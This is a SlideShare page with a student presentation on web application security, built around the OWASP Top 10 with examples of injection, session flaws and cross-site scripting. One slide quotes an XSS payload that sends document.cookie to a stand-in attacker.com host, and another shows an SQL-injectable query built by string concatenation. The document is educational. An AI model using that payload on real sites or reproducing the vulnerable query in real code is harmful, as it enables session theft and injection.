SlideShare a Scribd company logo
Web Application Security
CS200 PROJECT PRESENTATION
INSTRUCTOR: DR. FERDOUS AHMED
REFERENCE: HTTP://WWW.OWASP.ORG
1
Presented by:
Md Syed Ahamad
Project Role
 Theory
 Analysis
 Implementation
2
Topics
 Introduction
 Issues and solutions – OWASP
 Problems analysis
 Vulnerabilities
 preventions
 Common Mistakes
 Ways of approach
 Vulnerabilities Scanner
3
Background
 Many sensitive task are done through web
 Online banking, online shopping etc.
 Database access
 System administration
 Web applications and web users are targets of many attacks
 Network based attacks
 Injection
 Broken Authentication and Session Managements
 Cross site scripting
 And many more…
4
Introduction
 Web Application
 Web Browser communicates with Web Server to retrieve web pages.
 Web Application Security
 Deals specially with security of Web Applications
 Client – Server structure
5
Fundamentals of Web Apps.
 Uniform Resource Locator(URL)
 uniquely identify the location of a web page
 tells about type of communication, OS type, the type of web app.
code, and more.
 URL manipulation – a web application attack
6
Fundamentals of Web Apps.
 HTTP
 designates how the web browser and the web server communicate
with each other.
 Stateless protocol – a request is sent and a response is received after a
connection is established.
 Post Data
 Another portion of an HTTP request
 used when larger amounts of data need to be sent from the browser to
the web server
 Cookies
 Small amount of data supplied by web server and stored by web
browser
7
HTTP Request and Response
 Request – get
 Response – post
8
• Attack
• HTTP smuggling
• Cache Poisioning
Fundamentals of Web Apps.
 HTTPS
 HTTP wrapped with
Secure Sockets Layer
(SSL) encryption.
 Data sent is encrypted.
Protects data in transit.
9
Fundamentals of Web Apps. 10
 Firewall
 prevent unauthorized connections to protected network devices.
 Protect from network based attacks.
 Fail to protect web based attacks
Issues – Web based attacks
 OWASP
 An online Community dedicated to web application Security.
 It includes corporations, educational organizations, and individuals from
around the world.
 OWASP Top 10 – most important to discuss.
 to raise awareness about app. security by identifying some of the critical
risks organisations.
 Analyse clearly and solve the problems.
11
Applications Security Risks
 Attackers use different path to harm you.
 These factors determine the overall risk.
12
My Risks
 OWASP Risk Rating Methodology
13
OWASP Top 10
 A1 – Injection
 A2 – Broken Authentication and Session Managements
 A3 – Cross Site Scripting (XSS)
 A4 – Insecure Direct Object References
 A5 – Security Misconfiguration
 A6 – Sensitive Data Exposure
 A7 – Missing Function level Access Control
 A8 – Cross Site Request Forgery (CSRF)
 A9 – Using Known Vulnerable Components
 A10 – Invalidated Redirects and forwards
14
A1 - Injection
 Injection flaws – Sql, OS, LDAP etc.
 Data is sent to server as command and query.
 most prevalent and dangerous attacks on the Internet.
15
A1 - Injection
 Vulnerabilities
 Use of interpreter that clearly separates untrusted data, command or
query
 Avoid dynamic query, use stored procedures, prepared statements.
 Use of Code checking tools, penetration testers.
 Preventions
 Use of safe API.
 Escape special characters.
 No special characters – Positive or “white list” input validation.
16
A1 – Injection
 Example
 Scenario #1
String query = "SELECT * FROM accounts WHERE custID='" +
request.getParameter("id") + "'";
Select data from table where emailinput=‘email_input’;
17
A2 – Broken Authentication and
Session Management
 App. Related to session and authentication are not implemented correctly.
 Attackers try to compromise passwords, keys, or session tokens or user IDs.
18
A2 – Broken Authentication and
Session Management
 Vulnerabilities
 User IDs are not protected when stored using Hashing and encryption.
 guessed or overwritten through weak ac. Management.
 Session ID as exposed, don’t time out, don’t rotate after login etc.
 Preventions
 OWASP’s Application Security Verification Standard (ASVS).
 simple interface for developers.
 Strong effort to avoid XSS flaws.
19
A2 – Broken Authentication and
Session Management
 Example
 Scenario #1: Airline reservations application supports URL rewriting,
putting session IDs in the URL:
http://example.com/sale/saleitems;jsessionid=2P0OC2JSNDLPSKH
CJUN2JV?dest=Hawaii
20
A3 – Cross Site Scripting
 Malicious code are injected to website.
 Stored, reflected and DOM based.
21
A3 – Cross Site Scripting
 Vulnerabilities
 Input not properly escaped.
 Input validated.
22
A3 – Cross Site Scripting
 Example
 The application uses untrusted data in the construction of the following
HTML snippet without validation or escaping:
 (String) page += "<input name='creditcard' type='TEXT‘
value='" + request.getParameter("CC") + "'>";
 The attacker modifies the ‘CC’ parameter in his browser to:
 '><script>document.location= 'http://www.attacker.com/cgi-
bin/cookie.cgi? foo='+document.cookie</script>'.
23
Way of approach
 SSL
 Website Vulnerability Scanner
 Types
 Network scanner
 Port scanner
 Web app. Security scanner
24
Vulnerability Scanner
 Acunetix Web Vulnerability Scanner
 Cenzic Hailstorm
 GFI LANguard Network Security Scanner
 Teneble Nessus 3
 Nmap
 QualysGuard
 Retina Network Security Scanner
 SAINT Network Vulnerability Scanner
25
My Goal
 To implement a prevention mechanism.
 To implement a detection mechanism.
26

More Related Content

What's hot

Web Application Security and Awareness
Web Application Security and AwarenessWeb Application Security and Awareness
Web Application Security and Awareness
Abdul Rahman Sherzad
 
Web application security & Testing
Web application security  & TestingWeb application security  & Testing
Web application security & Testing
Deepu S Nath
 

What's hot (20)

Api security-testing
Api security-testingApi security-testing
Api security-testing
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilities
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
Web application security
Web application securityWeb application security
Web application security
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
 
Web Application Security 101
Web Application Security 101Web Application Security 101
Web Application Security 101
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
 
Security Testing Training With Examples
Security Testing Training With ExamplesSecurity Testing Training With Examples
Security Testing Training With Examples
 
Web application vulnerabilities
Web application vulnerabilitiesWeb application vulnerabilities
Web application vulnerabilities
 
Secure coding-guidelines
Secure coding-guidelinesSecure coding-guidelines
Secure coding-guidelines
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request Forgery
 
Web Application Security and Awareness
Web Application Security and AwarenessWeb Application Security and Awareness
Web Application Security and Awareness
 
Bug Bounty 101
Bug Bounty 101Bug Bounty 101
Bug Bounty 101
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
 
Penetration testing
Penetration testingPenetration testing
Penetration testing
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016
 
Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017
 
Web application security & Testing
Web application security  & TestingWeb application security  & Testing
Web application security & Testing
 
Security testing
Security testingSecurity testing
Security testing
 

Viewers also liked (7)

Your First Scala Web Application using Play 2.1
Your First Scala Web Application using Play 2.1Your First Scala Web Application using Play 2.1
Your First Scala Web Application using Play 2.1
 
Computer Based Ordering System
Computer Based Ordering SystemComputer Based Ordering System
Computer Based Ordering System
 
Customer ordering system
Customer ordering systemCustomer ordering system
Customer ordering system
 
Review of related literature and studies
Review of related literature and studiesReview of related literature and studies
Review of related literature and studies
 
Order processing system
Order processing systemOrder processing system
Order processing system
 
Chapter 2
Chapter 2Chapter 2
Chapter 2
 
Chapter 2-Realated literature and Studies
Chapter 2-Realated literature and StudiesChapter 2-Realated literature and Studies
Chapter 2-Realated literature and Studies
 

Similar to Web application security I

Top 10 web server security flaws
Top 10 web server security flawsTop 10 web server security flaws
Top 10 web server security flaws
tobybear30
 
OWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesOWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root Causes
Marco Morana
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root Causes
Marco Morana
 
EISA Considerations for Web Application Security
EISA Considerations for Web Application SecurityEISA Considerations for Web Application Security
EISA Considerations for Web Application Security
Larry Ball
 
Social Enterprise Rises! …and so are the Risks - DefCamp 2012
Social Enterprise Rises! …and so are the Risks - DefCamp 2012Social Enterprise Rises! …and so are the Risks - DefCamp 2012
Social Enterprise Rises! …and so are the Risks - DefCamp 2012
DefCamp
 

Similar to Web application security I (20)

Top 10 Web App Security Risks
Top 10 Web App Security RisksTop 10 Web App Security Risks
Top 10 Web App Security Risks
 
C01461422
C01461422C01461422
C01461422
 
Security in the cloud protecting your cloud apps
Security in the cloud   protecting your cloud appsSecurity in the cloud   protecting your cloud apps
Security in the cloud protecting your cloud apps
 
Security risks awareness
Security risks awarenessSecurity risks awareness
Security risks awareness
 
DataMindsConnect2018_SECDEVOPS
DataMindsConnect2018_SECDEVOPSDataMindsConnect2018_SECDEVOPS
DataMindsConnect2018_SECDEVOPS
 
Vulnerability manager v1.0
Vulnerability manager v1.0Vulnerability manager v1.0
Vulnerability manager v1.0
 
OWASP Evening #10
OWASP Evening #10OWASP Evening #10
OWASP Evening #10
 
Top 10 web server security flaws
Top 10 web server security flawsTop 10 web server security flaws
Top 10 web server security flaws
 
Owasp web security
Owasp web securityOwasp web security
Owasp web security
 
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo) Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
 
Web Vulnerabilities And Exploitation - Compromising The Web
Web Vulnerabilities And Exploitation - Compromising The WebWeb Vulnerabilities And Exploitation - Compromising The Web
Web Vulnerabilities And Exploitation - Compromising The Web
 
Are you fighting_new_threats_with_old_weapons
Are you fighting_new_threats_with_old_weaponsAre you fighting_new_threats_with_old_weapons
Are you fighting_new_threats_with_old_weapons
 
Application Security Vulnerabilities: OWASP Top 10 -2007
Application Security Vulnerabilities: OWASP Top 10  -2007Application Security Vulnerabilities: OWASP Top 10  -2007
Application Security Vulnerabilities: OWASP Top 10 -2007
 
OWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesOWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root Causes
 
OWASP Evening #10 Serbia
OWASP Evening #10 SerbiaOWASP Evening #10 Serbia
OWASP Evening #10 Serbia
 
Securing the Web @RivieraDev2016
Securing the Web @RivieraDev2016Securing the Web @RivieraDev2016
Securing the Web @RivieraDev2016
 
owasp top 10.ppt
owasp top 10.pptowasp top 10.ppt
owasp top 10.ppt
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root Causes
 
EISA Considerations for Web Application Security
EISA Considerations for Web Application SecurityEISA Considerations for Web Application Security
EISA Considerations for Web Application Security
 
Social Enterprise Rises! …and so are the Risks - DefCamp 2012
Social Enterprise Rises! …and so are the Risks - DefCamp 2012Social Enterprise Rises! …and so are the Risks - DefCamp 2012
Social Enterprise Rises! …and so are the Risks - DefCamp 2012
 

More from Md Syed Ahamad (10)

Bulk-Synchronous-Parallel - BSP
Bulk-Synchronous-Parallel - BSPBulk-Synchronous-Parallel - BSP
Bulk-Synchronous-Parallel - BSP
 
E mail protocol - SMTP
E mail protocol - SMTPE mail protocol - SMTP
E mail protocol - SMTP
 
3rdYearStudentProject
3rdYearStudentProject3rdYearStudentProject
3rdYearStudentProject
 
Coap based application for android phones-end
Coap based application for android phones-endCoap based application for android phones-end
Coap based application for android phones-end
 
Coap based application for android phones
Coap based application for android phonesCoap based application for android phones
Coap based application for android phones
 
Hierarchical clustering techniques
Hierarchical clustering techniquesHierarchical clustering techniques
Hierarchical clustering techniques
 
Gps technology presentation
Gps technology presentationGps technology presentation
Gps technology presentation
 
Web Application Security II - SQL Injection
Web Application Security II - SQL InjectionWeb Application Security II - SQL Injection
Web Application Security II - SQL Injection
 
Sociolinguistic and law
Sociolinguistic and lawSociolinguistic and law
Sociolinguistic and law
 
Wlan 802.11n - MAC Sublayer
Wlan 802.11n - MAC SublayerWlan 802.11n - MAC Sublayer
Wlan 802.11n - MAC Sublayer
 

Recently uploaded

Article writing on excessive use of internet.pptx
Article writing on excessive use of internet.pptxArticle writing on excessive use of internet.pptx
Article writing on excessive use of internet.pptx
abhinandnam9997
 
一比一原版UTS毕业证悉尼科技大学毕业证成绩单如何办理
一比一原版UTS毕业证悉尼科技大学毕业证成绩单如何办理一比一原版UTS毕业证悉尼科技大学毕业证成绩单如何办理
一比一原版UTS毕业证悉尼科技大学毕业证成绩单如何办理
aagad
 

Recently uploaded (12)

1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...
 
Stay Ahead with 2024's Top Web Design Trends
Stay Ahead with 2024's Top Web Design TrendsStay Ahead with 2024's Top Web Design Trends
Stay Ahead with 2024's Top Web Design Trends
 
ER(Entity Relationship) Diagram for online shopping - TAE
ER(Entity Relationship) Diagram for online shopping - TAEER(Entity Relationship) Diagram for online shopping - TAE
ER(Entity Relationship) Diagram for online shopping - TAE
 
The+Prospects+of+E-Commerce+in+China.pptx
The+Prospects+of+E-Commerce+in+China.pptxThe+Prospects+of+E-Commerce+in+China.pptx
The+Prospects+of+E-Commerce+in+China.pptx
 
How to Use Contact Form 7 Like a Pro.pptx
How to Use Contact Form 7 Like a Pro.pptxHow to Use Contact Form 7 Like a Pro.pptx
How to Use Contact Form 7 Like a Pro.pptx
 
The Use of AI in Indonesia Election 2024: A Case Study
The Use of AI in Indonesia Election 2024: A Case StudyThe Use of AI in Indonesia Election 2024: A Case Study
The Use of AI in Indonesia Election 2024: A Case Study
 
Multi-cluster Kubernetes Networking- Patterns, Projects and Guidelines
Multi-cluster Kubernetes Networking- Patterns, Projects and GuidelinesMulti-cluster Kubernetes Networking- Patterns, Projects and Guidelines
Multi-cluster Kubernetes Networking- Patterns, Projects and Guidelines
 
History+of+E-commerce+Development+in+China-www.cfye-commerce.shop
History+of+E-commerce+Development+in+China-www.cfye-commerce.shopHistory+of+E-commerce+Development+in+China-www.cfye-commerce.shop
History+of+E-commerce+Development+in+China-www.cfye-commerce.shop
 
Article writing on excessive use of internet.pptx
Article writing on excessive use of internet.pptxArticle writing on excessive use of internet.pptx
Article writing on excessive use of internet.pptx
 
The Best AI Powered Software - Intellivid AI Studio
The Best AI Powered Software - Intellivid AI StudioThe Best AI Powered Software - Intellivid AI Studio
The Best AI Powered Software - Intellivid AI Studio
 
一比一原版UTS毕业证悉尼科技大学毕业证成绩单如何办理
一比一原版UTS毕业证悉尼科技大学毕业证成绩单如何办理一比一原版UTS毕业证悉尼科技大学毕业证成绩单如何办理
一比一原版UTS毕业证悉尼科技大学毕业证成绩单如何办理
 
The AI Powered Organization-Intro to AI-LAN.pdf
The AI Powered Organization-Intro to AI-LAN.pdfThe AI Powered Organization-Intro to AI-LAN.pdf
The AI Powered Organization-Intro to AI-LAN.pdf
 

Web application security I

  • 1. Web Application Security CS200 PROJECT PRESENTATION INSTRUCTOR: DR. FERDOUS AHMED REFERENCE: HTTP://WWW.OWASP.ORG 1 Presented by: Md Syed Ahamad
  • 2. Project Role  Theory  Analysis  Implementation 2
  • 3. Topics  Introduction  Issues and solutions – OWASP  Problems analysis  Vulnerabilities  preventions  Common Mistakes  Ways of approach  Vulnerabilities Scanner 3
  • 4. Background  Many sensitive task are done through web  Online banking, online shopping etc.  Database access  System administration  Web applications and web users are targets of many attacks  Network based attacks  Injection  Broken Authentication and Session Managements  Cross site scripting  And many more… 4
  • 5. Introduction  Web Application  Web Browser communicates with Web Server to retrieve web pages.  Web Application Security  Deals specially with security of Web Applications  Client – Server structure 5
  • 6. Fundamentals of Web Apps.  Uniform Resource Locator(URL)  uniquely identify the location of a web page  tells about type of communication, OS type, the type of web app. code, and more.  URL manipulation – a web application attack 6
  • 7. Fundamentals of Web Apps.  HTTP  designates how the web browser and the web server communicate with each other.  Stateless protocol – a request is sent and a response is received after a connection is established.  Post Data  Another portion of an HTTP request  used when larger amounts of data need to be sent from the browser to the web server  Cookies  Small amount of data supplied by web server and stored by web browser 7
  • 8. HTTP Request and Response  Request – get  Response – post 8 • Attack • HTTP smuggling • Cache Poisioning
  • 9. Fundamentals of Web Apps.  HTTPS  HTTP wrapped with Secure Sockets Layer (SSL) encryption.  Data sent is encrypted. Protects data in transit. 9
  • 10. Fundamentals of Web Apps. 10  Firewall  prevent unauthorized connections to protected network devices.  Protect from network based attacks.  Fail to protect web based attacks
  • 11. Issues – Web based attacks  OWASP  An online Community dedicated to web application Security.  It includes corporations, educational organizations, and individuals from around the world.  OWASP Top 10 – most important to discuss.  to raise awareness about app. security by identifying some of the critical risks organisations.  Analyse clearly and solve the problems. 11
  • 12. Applications Security Risks  Attackers use different path to harm you.  These factors determine the overall risk. 12
  • 13. My Risks  OWASP Risk Rating Methodology 13
  • 14. OWASP Top 10  A1 – Injection  A2 – Broken Authentication and Session Managements  A3 – Cross Site Scripting (XSS)  A4 – Insecure Direct Object References  A5 – Security Misconfiguration  A6 – Sensitive Data Exposure  A7 – Missing Function level Access Control  A8 – Cross Site Request Forgery (CSRF)  A9 – Using Known Vulnerable Components  A10 – Invalidated Redirects and forwards 14
  • 15. A1 - Injection  Injection flaws – Sql, OS, LDAP etc.  Data is sent to server as command and query.  most prevalent and dangerous attacks on the Internet. 15
  • 16. A1 - Injection  Vulnerabilities  Use of interpreter that clearly separates untrusted data, command or query  Avoid dynamic query, use stored procedures, prepared statements.  Use of Code checking tools, penetration testers.  Preventions  Use of safe API.  Escape special characters.  No special characters – Positive or “white list” input validation. 16
  • 17. A1 – Injection  Example  Scenario #1 String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'"; Select data from table where emailinput=‘email_input’; 17
  • 18. A2 – Broken Authentication and Session Management  App. Related to session and authentication are not implemented correctly.  Attackers try to compromise passwords, keys, or session tokens or user IDs. 18
  • 19. A2 – Broken Authentication and Session Management  Vulnerabilities  User IDs are not protected when stored using Hashing and encryption.  guessed or overwritten through weak ac. Management.  Session ID as exposed, don’t time out, don’t rotate after login etc.  Preventions  OWASP’s Application Security Verification Standard (ASVS).  simple interface for developers.  Strong effort to avoid XSS flaws. 19
  • 20. A2 – Broken Authentication and Session Management  Example  Scenario #1: Airline reservations application supports URL rewriting, putting session IDs in the URL: http://example.com/sale/saleitems;jsessionid=2P0OC2JSNDLPSKH CJUN2JV?dest=Hawaii 20
  • 21. A3 – Cross Site Scripting  Malicious code are injected to website.  Stored, reflected and DOM based. 21
  • 22. A3 – Cross Site Scripting  Vulnerabilities  Input not properly escaped.  Input validated. 22
  • 23. A3 – Cross Site Scripting  Example  The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:  (String) page += "<input name='creditcard' type='TEXT‘ value='" + request.getParameter("CC") + "'>";  The attacker modifies the ‘CC’ parameter in his browser to:  '><script>document.location= 'http://www.attacker.com/cgi- bin/cookie.cgi? foo='+document.cookie</script>'. 23
  • 24. Way of approach  SSL  Website Vulnerability Scanner  Types  Network scanner  Port scanner  Web app. Security scanner 24
  • 25. Vulnerability Scanner  Acunetix Web Vulnerability Scanner  Cenzic Hailstorm  GFI LANguard Network Security Scanner  Teneble Nessus 3  Nmap  QualysGuard  Retina Network Security Scanner  SAINT Network Vulnerability Scanner 25
  • 26. My Goal  To implement a prevention mechanism.  To implement a detection mechanism. 26